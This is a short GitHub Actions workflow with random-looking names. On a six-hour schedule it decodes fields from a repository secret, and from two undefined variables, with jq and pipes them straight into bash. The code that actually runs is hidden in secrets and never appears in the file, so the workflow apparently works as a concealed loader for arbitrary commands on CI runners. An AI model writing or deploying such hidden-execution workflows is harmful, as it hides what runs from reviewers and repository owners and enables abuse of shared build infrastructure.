name: wuzhurong1122

on:
  workflow_dispatch:
  schedule:
    - cron: '30 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuzhurong1122
        env:
          mo5289: ${{ secrets.mo5289 }}
        run: |
          echo $mo5289 | jq -r .tppq914 | /bin/bash
          echo $am81 | jq -r .nl8 | /bin/bash
          echo $qtz3954 | jq -r .ewj23565 | /bin/bash

